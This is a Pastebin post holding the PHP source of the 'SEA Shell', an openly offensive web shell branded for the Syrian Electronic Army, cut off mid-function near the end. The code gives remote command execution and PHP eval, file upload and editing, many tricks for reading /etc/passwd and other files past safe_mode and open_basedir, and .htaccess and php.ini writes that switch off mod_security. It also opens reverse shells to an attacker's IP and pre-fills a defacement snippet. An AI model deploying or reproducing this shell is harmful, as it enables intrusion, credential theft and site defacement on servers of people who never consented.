Googleinurl

[SHELL_SCRIPT]=> SyRiAn Electronic Army Shell :: SEA Shell

Aug 26th, 2014
1,117
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. # Bypass SuHosin
  3. # Virtual
  4. # users 6 ID /etc/passwd
  5.  
  6. $user = 'mhu';
  7. $pass = 'mhu';
  8. $uselogin = 1;
  9. $sh3llColor = "green";
  10.  
  11. # MySQL Info ---------
  12. $DBhost = "localhost";
  13. $DBuser = "root";
  14. $DBpass = "root";
  15. #---------------------
  16. session_start();
  17. error_reporting(0);
  18. set_magic_quotes_runtime(0);
  19. set_time_limit(0);
  20. ignore_user_abort(TRUE);
  21. ini_restore("safe_mode");
  22. ini_restore("open_basedir");
  23. ini_set('max_execution_time',0);
  24. ini_set('output_buffering',0);
  25. ini_set('safe_mode','Off');
  26.  
  27. // Set Current Directory
  28. if(!$_POST && !$_SESSION['curDir']) {
  29.     $dir = getcwd();
  30.     $_SESSION['curDir'] = $dir;
  31. } else if(empty($_POST['curDir'])) {
  32.     $dir = $_SESSION['curDir'];
  33. } else {
  34.     $dir = filter($_POST['curDir']);
  35.     $_SESSION['curDir'] = $dir;
  36. }
  37. // Set Dir Mode
  38. if($_GET['dir_mode']) {
  39.     $dir_mode = $_GET['dir_mode'];
  40.     $_SESSION['dir_mode'] = $dir_mode;
  41. } else {
  42.     $dir_mode = $_SESSION['dir_mode'];
  43. }
  44.  
  45. // Set Usable Command
  46. if($_POST['exe_method']) {
  47.     $exec_method = $_POST['exe_method'];
  48. } else {
  49.     $exec_method = "exec";
  50. }
  51. # Logout
  52. if($_POST['logout']) {
  53.     print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
  54.     print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
  55. }
  56. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
  57. if($_GET['info']){phpinfo();}
  58. $safeMode = SafeMode();
  59. $server = substr($SERVER_SOFTWARE,0,120);
  60. $daemon = "";
  61. ?>
  62. <html>
  63. <head>
  64. <title>SyRiAn Electronic Army Shell :: SEA Shell</title>
  65. <link rel="shortcut icon" href='http://i40.tinypic.com/2rpuped.png' />
  66. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  67. <?php echo CSS($sh3llColor); ?>
  68.  
  69. </head>
  70. <body dir='ltr'>
  71. <?php
  72. # ---------------------------------------#
  73. #             Authentication             #
  74. #----------------------------------------#
  75. if ($uselogin ==1) {
  76.     if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
  77.         if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
  78.         if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
  79.             print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
  80.         } else {
  81.             if($_POST['usrname']){
  82.                 print'<script>alert("Go and play in the street man !!");</script>';
  83.             }
  84. ?>
  85. <br><br>
  86.             <center><img src="http://i40.tinypic.com/2rpuped.png"><br />
  87.             <sy>SyRiAn Electronic Army</sy>
  88.             </center><br />
  89.             <div align="center">
  90.                 <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
  91.                 <input dir="ltr" name="usrname" id="username" value="" type="text"  size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
  92.                 <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
  93.                 <input type="submit" value=" Login  " name="login" />
  94.                 </form>
  95.             </div>
  96.             <?php
  97.             footer();
  98.             exit;
  99.         }
  100.     }
  101. }
  102. ?>
  103. <table cellpadding='0' cellspacing='0' width='100%'>
  104.     <tr>
  105.         <td width='160'>
  106.         <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  107.             <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://i40.tinypic.com/2rpuped.png' width='100%' height='100%'></a><br>
  108.             <center>SyRiAn Electronic Army
  109.             <p></p>
  110.                 <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  111.                     <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  112.                     <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  113.                 </select>
  114.             </center>
  115.       </td>
  116.       <td>
  117.       <form method="post">
  118. <table width='100%' style="border:none; padding:2px;" >
  119.     <tr>
  120.         <td width='103'>System</td>
  121.         <td width="323"><?php echo $os; ?></td>
  122.         <td width="90">Apache Modules</td>
  123.         <td width="278"><select ><?php
  124.         if(function_exists("apache_get_modules")) {
  125.             foreach (apache_get_modules() as $module) {
  126.                 echo "<option>".$module."</option>";
  127.             }
  128.         }else {
  129.             echo "<option>NONE</option>";
  130.         }
  131.         ?></select></td>
  132.     </tr>
  133.     <tr>
  134.       <td>uname </td>
  135.       <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  136.       <td>Curl</td>
  137.       <td><?php echo Curl(); ?></td>
  138.     </tr>
  139.     <tr>
  140.         <td>pwd</td>
  141.         <td><?php echo getcwd(); ?></td>
  142.         <td>Open Basedir</td>
  143.         <td><?php echo openBaseDir(); ?></td>
  144.     </tr>
  145.     <tr>
  146.         <td>whoami</td>
  147.         <td><?php echo get_current_user(); ?></td>
  148.         <td>Magic_Quotes</td>
  149.         <td><?php echo magicQouts(); ?></td>
  150.     </tr>
  151.         <tr>
  152.           <td>Server</td>
  153.           <td><?php echo $server; ?></td>
  154.           <td>Register Globals</td>
  155.           <td><?php echo RegisterGlobals(); ?></td>
  156.         </tr>
  157.         <tr>
  158.           <td>Server Name</td>
  159.           <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  160.           <td>Gzip</td>
  161.           <td><?php echo Gzip(); ?></td>
  162.         </tr>
  163.         <tr>
  164.           <td>Your IP</td>
  165.           <td><?php echo GetRealIP(); ?></td>
  166.           <td>Oracle</td>
  167.           <td><?php echo Oracle(); ?></td>
  168.         </tr>
  169.         <tr>
  170.           <td>Server IP</td>
  171.           <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  172.           <td>MSQL</td>
  173.           <td><?php echo MSQL(); ?></td>
  174.         </tr>
  175.         <tr>
  176.           <td>PHP Version</td>
  177.           <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  178.           <td>MySQL</td>
  179.           <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  180.         </tr>
  181.         <tr>
  182.           <td>Safe Mode</td>
  183.           <td><?php echo $safeMode; ?></td>
  184.           <td>MySQLi</td>
  185.           <td><?php echo MysqlI(); ?></td>
  186.         </tr>
  187.         <tr>
  188.         <td>disable functions</td>
  189.         <td><select name="disableFunctions"><?php
  190.         $funArray = DisableFunctions();
  191.         $funArray = explode(",",$funArray);
  192.         sort($funArray);
  193.         foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  194.         ?></select>
  195.           <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  196.           </td>
  197.         <td>MsSQL</td>
  198.         <td><?php echo MsSQL(); ?></td>
  199.         </tr>
  200. </table>
  201. &nbsp;   [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  202. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  203. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  204. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  205. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  206. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  207. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  208. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  209. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  210. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  211. <br>
  212. </form>
  213. </table>
  214.  
  215. <form method="post">
  216. <center>
  217. <textarea cols="150" rows="20" name="result" >
  218. <?php
  219. chdir($dir);
  220. if($_POST['login'] || !$_POST){echo ScanDirs();}
  221. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
  222. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
  223. else if($_POST['UPLOAD_Execute']) {
  224.     for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
  225.         if($_FILES['uploadfile']['name'][$i] != '') {
  226.             if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  227.             else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  228.             if($upload) {echo "The File  ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
  229. ";  }
  230.             else { echo "The File  ".$_FILES['uploadfile']['name'][$i]."  Can't Be Upload :( !
  231. ";}
  232.         }
  233.     }      
  234. }
  235. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
  236. else if($_POST['SAVE_Execute']) {
  237.     $content = filter($_POST['result']);
  238.     if(empty($content)){$content = " ";}
  239.     if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
  240. }
  241. else if($_POST['READ_Execute']) {
  242.     $path = urldecode(filter($_POST['READ_Line']));
  243.     $file = fopen($path,'r+');
  244.     if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path)));  }
  245.     else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
  246.     else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
  247.     else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
  248.     else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
  249.     else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
  250.     else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
  251.     else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
  252.     else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
  253.     else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
  254.     else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
  255.     else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
  256.     else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
  257.     else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
  258.     else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
  259.     else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
  260.     else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
  261.     else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
  262.     else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
  263.     else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
  264. }
  265. else if($_POST['STOP_Execute']) {
  266. $genTry = GenerateFile("php.ini","
  267. safe_mode = Off
  268. disable_functions = NONE
  269. safe_mode_gid = OFF
  270. open_basedir = OFF");
  271.     if($genTry){echo "[+] php.ini Has Been Generated Successfully
  272. ";}
  273.     else {echo "[-] Failed to generate php.ini file !!
  274. ";}
  275.    
  276.     $genTry = GenerateFile(".htaccess","
  277. <IfModule mod_security.c>
  278. SecFilterEngine Off
  279. SecFilterScanPOST Off
  280. SecFilterCheckURLEncoding Off
  281. SecFilterCheckCookieFormat Off
  282. SecFilterCheckUnicodeEncoding Off
  283. SecFilterNormalizeCookies Off
  284. </IfModule>
  285. <Limit GET POST>
  286. order deny,allow
  287. deny from all
  288. allow from all
  289. </Limit>
  290. <Limit PUT DELETE>
  291. order deny,allow
  292. deny from all
  293. </Limit>
  294. SetEnv PHPRC ".getcwd()."/php.ini
  295.     ");
  296.     if($genTry){echo "[+] .htaccess Has Been Generated Successfully
  297. ";}
  298.     else {echo "[-] Failed to generate .htaccess file !!
  299. ";}
  300. }
  301. else if($_POST['CON_Type'] == "socks") {
  302.     $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  303.     if($sock < 0){echo "[-] failed to create socket.";}
  304.     else {
  305.         $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
  306.         if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
  307.         else {
  308.             $send_var = "\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$";
  309.             socket_write($sock, $send_var, strlen($send_var));
  310.             while($input = socket_read($sock, 10000)) {
  311.                 socket_write($sock, shell_exec($input), 12000);
  312.             }
  313.         }
  314.     }
  315. } else if($_POST['CON_Type'] == "fsockopen") {
  316.     $ip = filter(trim($_POST['ip']));
  317.     $port = filter(trim($_POST['port']));
  318.     if (!empty($ip)) {
  319.         $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
  320.         if (!$con_fsockopen){
  321.             $result = "Error: didnt connect !!!";
  322.         } else {
  323.             $newLine="\n";          
  324.             fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
  325.             fputs($con_fsockopen , system("uname -a") .$newLine );
  326.             fputs($con_fsockopen , system("pwd") .$newLine );
  327.             fputs($con_fsockopen , system("id") .$newLine.$newLine );
  328.             while(!feof($con_fsockopen)){  
  329.                 fputs ($con_fsockopen);
  330.                 $one="[$";
  331.                 $two="]";
  332.                 $result= fgets ($con_fsockopen, 8192);
  333.                 $message = $result;
  334.                 fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
  335.             }
  336.             fclose ($con_fsockopen);
  337.         }
  338.     }
  339. }
  340. else if($_POST['USERS_1']){echo GetUsers1();}
  341. else if($_POST['USERS_2']) {
  342.      $array = GetUsers2();
  343.      foreach($array as $line)
  344.      {echo $line."
  345. ";}
  346. }
  347. else if($_POST['USERS_3']) {
  348.      $array = GetUsers3();
  349.      foreach($array as $line)
  350.      {echo $line."
  351. ";}
  352. }
  353. else if($_POST['USERS_4']) {
  354.      $array = GetUsers4();
  355.      foreach($array as $line)
  356.      {echo $line."
  357. ";}
  358. } else if($_POST['USERS_5']){echo GetUsers5();}
  359. else if($_POST['forbidden_bypass']) {
  360.     mkdir("forbidden");
  361.     chdir("forbidden");
  362.     $forbidden_htaccess = GenerateFile(".htaccess", "
  363. DirectoryIndex sea.txt
  364. HeaderName sea.txt
  365. ReadmeName sea.txt
  366. footerName sea.txt
  367. ErrorDocument 404 /404.html
  368. 404.html = Symlinked sea.txt
  369. Options all
  370. ForceType text/plain
  371. AddType text/plain .php
  372. AddType text/plain .html
  373. AddHandler server-parsed .php
  374. AddHandler txt .php
  375.     ");
  376.     if($forbidden_htaccess) {
  377.         echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
  378.     } else {
  379.         echo "[-] error with generating .htaccess file.";
  380.     }
  381. } else if($_POST['find_755']) {
  382.     Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
  383. }
  384. ?></textarea>
  385. <?php
  386. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  387. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  388. ";}
  389. ?>
  390. </center></form>
  391. <table width='100%'>
  392.     <tr valign="top">
  393.         <td width='30%'>
  394.        <!-- Command Line -->
  395.        <form method='POST' enctype="multipart/form-data">
  396.             <table height='72' border='0' id='Box' width="100%">
  397.               <tr>
  398.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  399.                     <td style="background-color:#666;padding-left:10px;">Edit File
  400.                     <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  401.               </tr>
  402.                 <tr>
  403.                   <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  404.                 </tr>
  405.             </table>
  406.         </form>
  407.         <!-- End Of Command Line-->
  408.        
  409.         </td>
  410.         <td width='30%' height='30'>
  411.          <!-- Command Line -->
  412.          <form method='POST' enctype="multipart/form-data">
  413.               <table height='72' border='0' id='Box'>
  414.               <tr>
  415.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  416.                 <td style="background-color:#666;padding-left:10px;">Command Line
  417.                 <?php echo print_exe_method(); ?>
  418.                 <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  419.                 </td>
  420.             </tr>
  421.                 <tr>
  422.                   <td height="45" colspan="2">
  423.                     <?php echo SelectCommand($os); ?>
  424.                     <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
  425.                   <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  426.                 </tr>
  427.             </table>
  428.         </form>
  429.         <!-- End Of Command Line-->
  430.       </td>
  431.         <td width='30%' height='30' valign="top">
  432.         <!-- Commands Alias-->
  433.         <form method='POST' enctype="multipart/form-data">
  434.             <table width='100%' height='72' border='0' id='Box'>
  435.               <tr>
  436.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  437.                     <td style="background-color:#666;padding-left:10px;">Upload Files             <span style="padding-left:10px;">
  438.                       <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  439.                     <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  440.                     </span></td>
  441.               </tr>
  442.                 <tr>
  443.                   <td height="45" colspan="2">
  444.                   <input type='file' name='uploadfile[]'>
  445.                   <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  446.                 </tr>
  447.             </table>
  448.         </form>
  449.         <!-- End Of Commands Alias-->
  450.         </td>
  451.     </tr>
  452. <tr valign="top">
  453.         <td width='30%'>
  454.        <!-- Commands Alias-->
  455.        <form method='POST' enctype="multipart/form-data">
  456.             <table width='100%' height='72' border='0' id='Box'>
  457.               <tr>
  458.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  459.                     <td style="background-color:#666;padding-left:10px;">PHP Eval                
  460.                     <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  461.               </tr>
  462.                 <tr>
  463.                   <td height="45" colspan="2"><label for="PHP_Line"></label>
  464.                   <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  465.     fwrite($file,"Hacked");
  466.     fclose($file);';}
  467.                 ?>
  468.                   </textarea>
  469.                   <br></td>
  470.               </tr>
  471.             </table>
  472.         </form>
  473.         <!-- End Of Commands Alias-->
  474.         </td>
  475.         <td width='30%' height='30'>
  476.         <!-- Commands Alias-->
  477.         <form method='POST' enctype="multipart/form-data">
  478.         <table width='100%' height='72' border='0' id='Box'>
  479.           <tr>
  480.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  481.                 <td style="background-color:#666;padding-left:10px;">Read Files
  482.                  
  483.                   <select name="READ_Type" >
  484.                     <option value="file" >file</option>
  485.                     <option value="fgets" >fgets</option>
  486.                     <option value="fgetss" >fgetss</option>
  487.                     <option value="readfile" >readfile</option>
  488.                     <option value="fread" >fread</option>
  489.                     <option value="show_source" >show_source</option>
  490.                     <option value="file_get_contents" >file_get_contents</option>
  491.                     <option value="tempnam" >tempnam</option>
  492.                     <option value="copy" >copy</option>
  493.                     <option value="symlink" >Symlink</option>
  494.                     <option value="mb_send_mail" >mb_send_mail</option>
  495.                     <option value="highlight_file" >highlight_file</option>
  496.                     <option value="curl" >Curl</option>
  497.                     <option value="imap" >Imap</option>
  498.                     <option value="mysql" >MySQL</option>
  499.                     <option value="mysqli" >MySQLI</option>
  500.                     <option value="ioncube">Ion Cube</option>
  501.                     <option value="error_log">Error_Log</option>
  502.                     <option value="include">Include</option>
  503.                     <option value="id" >ID /etc/passwd</option>
  504.                   </select>
  505.                   <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  506.           </tr>
  507.             <tr>
  508.               <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  509.           </tr>
  510.         </table>
  511.         </form>
  512.         <!-- End Of Commands Alias-->
  513.   </td>
  514.         <td width='30%' height='30' valign="top">
  515.         <!-- Commands Alias-->
  516.         <form method='POST' enctype="multipart/form-data">
  517.         <table width='100%' height='72' border='0' id='Box'>
  518.           <tr>
  519.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  520.                 <td style="background-color:#666;padding-left:10px;">Back Connection
  521.                 <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  522.           </tr>
  523.             <tr>
  524.               <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  525.               <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  526.               <select name="CON_Type" >
  527.                 <option value="socks">SOCKS</option>
  528.                 <option value="fsockopen">FSOCKOPEN</option>
  529.               </select>
  530.               </td>
  531.             </tr>
  532.         </table>
  533.         </form>
  534.         <!-- End Of Commands Alias-->
  535.         </td>
  536.     </tr>
  537. </table>
  538. <?php
  539. function IncludeReader($path) {
  540.     global $os;
  541.     if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  542.     $fileName = substr(strrchr($path,$slash),1);
  543.     $includePath = substr($path,0,strpos($path,$fileName,0));
  544.     ini_set("include_path",$includePath);
  545.     include($fileName);
  546. }
  547. function GetUsers1() {
  548.     return Exe('ls /var/mail');
  549. }
  550. function GetUsers2() {
  551.     $array = array();
  552.     $lines = file("/etc/passwd");
  553.     foreach($lines as $nr=>$val) {
  554.         $str = explode(":",$val);
  555.         array_push($array,$str[0]);
  556.     }
  557.     return $array;
  558. }
  559. function GetUsers3() {
  560.     $array = array();
  561.     if ($dh = opendir("/home/"))  {
  562.         while (($file = readdir($dh)) !== false)  {
  563.             array_push($array,$file);
  564.         }
  565.         closedir($dh);
  566.         return $array;
  567.     }
  568. }
  569. function GetUsers4() {
  570.     $dir = "/home/";
  571.     $array = array();
  572.      if ($dh = opendir($dir)) {
  573.         $f = readdir($dh);
  574.         while (($f = readdir($dh)) !== false) {
  575.             $dh2=opendir($dir."/");
  576.             $f2 = readdir($dh2);
  577.             while (($f2 = readdir($dh2)) !== false) {
  578.                 $f2.="/";
  579.                 $dh3=opendir($dir.$f.$f2);
  580.                 $f3 = readdir($dh3);
  581.                 while (($f3 = readdir($dh3)) !== false) {
  582.                     array_push($array,$f3);
  583.                 }
  584.             }
  585.         }
  586.         closedir($dh);
  587.         return $array;
  588.      } 
  589. }
  590. function GetUsers5(){
  591.     return realpath('/etc/passwd');
  592. }
  593. function ErrorLog($path){
  594.     $tempFile = uniqid();
  595.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  596.     error_log(file_get_contents($path), 3, $tempFile);
  597.     $content = file_get_contents($tempFile);
  598.     unlink($tempFile);
  599.     return $content;   
  600. }
  601. function SymlinkF($path) {
  602.     $tempFile = uniqid();
  603.     if(function_exists('symlink')) {
  604.         symlink($path,$tempFile);
  605.         $content = file_get_contents($tempFile);
  606.         unlink($tempFile);
  607.         return $content;
  608.     }
  609. }
  610. function MySQLReader($path) {
  611.     global $DBhost,$DBuser,$DBpass;
  612.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  613.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  614.     mysql_query("CREATE DATABASE a");
  615.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  616.     mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  617.     mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  618.     $result = mysql_query("SELECT a FROM a.a");
  619.     while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  620.     mysql_query("DROP DATABASE a");
  621. }
  622. function MySQLIReader($path) {
  623.     global $DBhost,$DBuser,$DBpass;
  624.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  625.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  626.     mysql_query("CREATE DATABASE a");
  627.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  628.    
  629.     function r($fp, &$buf, $len, &$err) {
  630.       print fread($fp, $len);
  631.     }
  632.     $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  633.     $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  634.     $m->set_local_infile_handler("r");
  635.     $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  636.     $m->close();
  637. }
  638. function DBConnect($host,$user,$pass,$db) {
  639.     $connect = mysql_pconnect($host,$user,$pass);
  640.     if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false;  }
  641.     else {
  642.         $tryToSelectDB = mysql_select_db($db,$connect);
  643.         if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false;      }
  644.         else{return true; return $connect;}
  645.     }
  646. }
  647. function ReadId($path) {
  648.     for($uid=0;$uid<60000;$uid++) {  
  649.         $ara = posix_getpwuid($uid);
  650.         if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
  651.         }
  652.     }
  653.     return $content;
  654. }
  655. function ImapF($path) {
  656.     $stream = imap_open($path, "", "");
  657.     $str = imap_body($stream, 1);
  658.     imap_close($stream);
  659.     return $str;
  660. }
  661. function FileF($path) {
  662.     $lines = file($path); foreach($lines as $line){$content .= $line;}
  663.     return $content;
  664. }
  665. function CopyF($path) {
  666.     $tempFile = md5(uniqid()).".bb";
  667.     copy($path,$tempFile);
  668.     $content = file_get_contents($tempFile);
  669.     unlink($tempFile);
  670.     return $content;
  671. }
  672. function fgetssF($path) {
  673.     while(($line = fgetss($path)) != false){$content .= $line;}
  674.     return $content;
  675. }
  676. function highlightFile($path) {
  677.     return highlight_file($path);
  678. }
  679. function mbSendEmail($path) {
  680.     if(function_exists('mb_send_mail')) {
  681.         $tempFile = uniqid();
  682.         $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
  683.         mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
  684.         $content = file_get_contents($tempFile);
  685.         unlink($tempFile);
  686.         return $content;
  687.     }
  688. }
  689. function DeleteFile($fileName) {
  690.     global $os;
  691.     if(function_exists('unlink'))
  692.     {$delete = unlink($fileName);}
  693.     if((!$delete) && ($os == 'Windows'))
  694.     {$delete = Exe("del $fileName"); }
  695.     else if((!$delete) && ($os == 'Linux'))
  696.     {$delete = Exe("rm -f $fileName");}
  697.     if($delete){return true;}else{return false;}
  698. }
  699. function CurlFileRead($path) {
  700.     $ch = curl_init("file://".$path."\x00".__FILE__);
  701.     var_dump(curl_exec($ch));
  702. }
  703. function FReadF($path) {
  704.     $file = fopen($path,'r+'); //Open The File
  705.     if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
  706.     fclose($file);
  707. }
  708. function TempnameF($path) {
  709.     global $dir;
  710.     $temp = tempnam($dir, "cx");
  711.     if(copy("compress.zlib://".$path, $temp)) {
  712.         $handler = fopen($temp, "r");
  713.         $readFile = fread($handler, @filesize($temp));
  714.         fclose($handler);
  715.         $content .= htmlspecialchars($filename);
  716.         $content .= nl2br(htmlspecialchars($readFile));
  717.         $content .= htmlspecialchars($filename);
  718.         unlink($temp);
  719.         return $content;
  720.     }  
  721. }
  722. function Evaluation($eval) {
  723.     $eval = str_replace(array("<?php","<?","?>"),"",$eval);
  724.     $eval = eval($eval);
  725.     if($eval){return true;}else{return false;}
  726. }
  727. function Oracle() {
  728.     if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  729.     else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  730. }
  731. function MsSQL() {
